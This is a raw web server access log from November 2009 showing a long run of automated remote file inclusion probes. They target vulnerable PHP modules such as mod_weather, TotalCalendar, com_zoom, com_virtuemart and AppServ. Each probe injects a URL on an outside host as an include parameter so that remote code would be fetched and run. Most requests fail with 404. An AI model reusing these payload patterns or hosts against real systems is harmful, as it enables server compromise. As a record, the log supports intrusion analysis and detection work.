202.122.19.24 - - [01/Nov/2009:00:52:26 -0400] "GET /logs/error_log.Q109071000//atom.php5?page=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.205.6.233 - - [01/Nov/2009:00:52:26 -0400] "GET /logs/access_log.Q109082200//admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
210.205.6.233 - - [01/Nov/2009:00:52:26 -0400] "GET /logs/error_log.Q109082200//admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
210.205.6.233 - - [01/Nov/2009:00:52:26 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
210.205.6.233 - - [01/Nov/2009:00:52:26 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
202.123.212.188 - - [01/Nov/2009:00:52:29 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:52:29 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:52:29 -0400] "GET /logs/access_log.Q109081700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:52:37 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:52:38 -0400] "GET /logs/access_log.Q109081700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:52:38 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:47 -0400] "GET /logs//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:47 -0400] "GET //modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:47 -0400] "GET /logs/access_log.Q109060400//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:48 -0400] "GET //modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:48 -0400] "GET /logs//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:48 -0400] "GET /logs/access_log.Q109060400//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:49 -0400] "GET //modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:49 -0400] "GET /logs//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:49 -0400] "GET /logs/access_log.Q109060400//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:54 -0400] "GET //modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:00:52:54 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:00:52:54 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:54 -0400] "GET /logs//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:52:54 -0400] "GET /logs/access_log.Q109060400//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.236.47.182 - - [01/Nov/2009:00:52:54 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:00:53:03 -0400] "GET ///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:00:53:03 -0400] "GET /logs///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:00:53:03 -0400] "GET /logs/access_log.Q109062300///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:53:09 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:53:09 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:53:09 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:53:18 -0400] "GET /logs/access_log.Q109060400%20%20//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:53:21 -0400] "GET /logs/access_log.Q109060400%20%20//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:53:24 -0400] "GET /logs/access_log.Q109060400%20%20//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:53:25 -0400] "GET /logs/access_log.Q109060400%20%20//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:53:37 -0400] "GET /logs/access_log.Q109062500%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:00:54:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.123.212.188 - - [01/Nov/2009:00:54:42 -0400] "GET /logs/access_log.Q109082100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:54:50 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:54:50 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:54:50 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
95.211.6.161 - - [01/Nov/2009:00:54:54 -0400] "GET /logs/access_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:54:54 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:54:54 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
211.223.201.177 - - [01/Nov/2009:00:54:56 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:54:56 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:54:56 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:00:54:58 -0400] "GET /logs/access_log.Q109081000//modules/TotalCalendar/about.php?inc_dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:00:54:58 -0400] "GET /logs/access_log.Q109081000//modules/TotalCalendar/about.php?inc_dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:00:54:58 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:00:54:58 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:00:54:59 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:00:54:59 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
95.211.6.161 - - [01/Nov/2009:00:55:02 -0400] "GET /logs/error_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
211.223.201.177 - - [01/Nov/2009:00:55:02 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:55:02 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:55:02 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
95.211.6.161 - - [01/Nov/2009:00:55:03 -0400] "GET /logs/access_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:55:03 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:55:03 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
91.202.253.13 - - [01/Nov/2009:00:55:04 -0400] "GET /logs/error_log.Q109081000//modules/TotalCalendar/about.php?inc_dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:00:55:04 -0400] "GET /logs/error_log.Q109081000//modules/TotalCalendar/about.php?inc_dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
95.211.6.161 - - [01/Nov/2009:00:55:10 -0400] "GET /logs/error_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
211.223.201.177 - - [01/Nov/2009:00:55:11 -0400] "GET /logs/access_log.Q109062500%20%20//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:55:15 -0400] "GET /logs/access_log.Q109062500%20%20//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:55:21 -0400] "GET /logs/access_log.Q109062100%20%20/index1.php?=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:55:21 -0400] "GET /index1.php?=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:55:22 -0400] "GET /logs/index1.php?=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:55:22 -0400] "GET /logs/access_log.Q109082100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:55:23 -0400] "GET /logs/access_log.Q109062500%20%20//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:00:55:27 -0400] "GET /logs/access_log.Q109062300%20%20///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:55:42 -0400] "GET /logs/access_log.Q109061800%20%20/index1.php?=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:00:56:01 -0400] "GET ///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:00:56:01 -0400] "GET /logs///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:00:56:01 -0400] "GET /logs/access_log.Q109062300///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.94.201.138 - - [01/Nov/2009:00:56:21 -0400] "GET /errors.php?error=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.94.201.138 - - [01/Nov/2009:00:56:25 -0400] "GET /logs/errors.php?error=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.94.201.138 - - [01/Nov/2009:00:56:25 -0400] "GET /logs/access_log.Q109092200/errors.php?error=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.170.40.230 - - [01/Nov/2009:00:56:25 -0400] "GET /appserv/main.php?appserv_root=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
79.170.40.230 - - [01/Nov/2009:00:56:25 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:56:30 -0400] "GET //modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:56:30 -0400] "GET /logs//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:56:32 -0400] "GET //modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:56:32 -0400] "GET /logs//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
79.170.40.230 - - [01/Nov/2009:00:56:32 -0400] "GET /logs/access_log.Q109051400%20%20/appserv/main.php?appserv_root=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
79.170.40.230 - - [01/Nov/2009:00:56:32 -0400] "GET /logs/access_log.Q109092600%20%20/appserv/main.php?appserv_root=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:00:56:49 -0400] "GET /appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:00:56:49 -0400] "GET /logs/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:00:56:53 -0400] "GET /logs/access_log.Q109051400%20%20/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:00:56:54 -0400] "GET /logs/access_log.Q109092600%20%20/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:56:58 -0400] "GET //modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:56:58 -0400] "GET /logs//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:57:04 -0400] "GET //modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:57:04 -0400] "GET /logs//modules/mod_weather.php?absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:57:06 -0400] "GET /?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:57:06 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:57:06 -0400] "GET /logs/?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 24198 "-" "Mozilla/5.0"
85.94.201.138 - - [01/Nov/2009:00:57:09 -0400] "GET /logs/error_log.Q109092300/errors.php?error=http://www.duna21.co.kr/bbs/icon/icon1.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:00:57:47 -0400] "GET /appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:00:57:47 -0400] "GET /logs/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:00:57:49 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:00:57:52 -0400] "GET /logs/access_log.Q109092600/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:00:57:58 -0400] "GET /appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:00:58:02 -0400] "GET /logs/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:00:58:10 -0400] "GET /appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:00:58:12 -0400] "GET /logs/access_log.Q109092600%20%20/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:00:58:15 -0400] "GET /logs/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:00:58:17 -0400] "GET /logs/access_log.Q109051400%20%20/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:00:58:19 -0400] "GET /logs/access_log.Q109100600///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:00:58:23 -0400] "GET /logs/access_log.Q109051400%20%20/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:00:58:27 -0400] "GET /logs/access_log.Q109092600%20%20/appserv/main.php?appserv_root=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:58:41 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:59:02 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:00:59:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.182 - - [01/Nov/2009:00:59:03 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:59:09 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:59:13 -0400] "GET /logs/error_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:59:23 -0400] "GET /logs/error_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:00:59:39 -0400] "GET /logs/error_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:59:47 -0400] "GET ///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:59:47 -0400] "GET /logs/access_log.Q109101400///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:59:47 -0400] "GET /logs///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:59:48 -0400] "GET ///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:59:48 -0400] "GET /logs///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
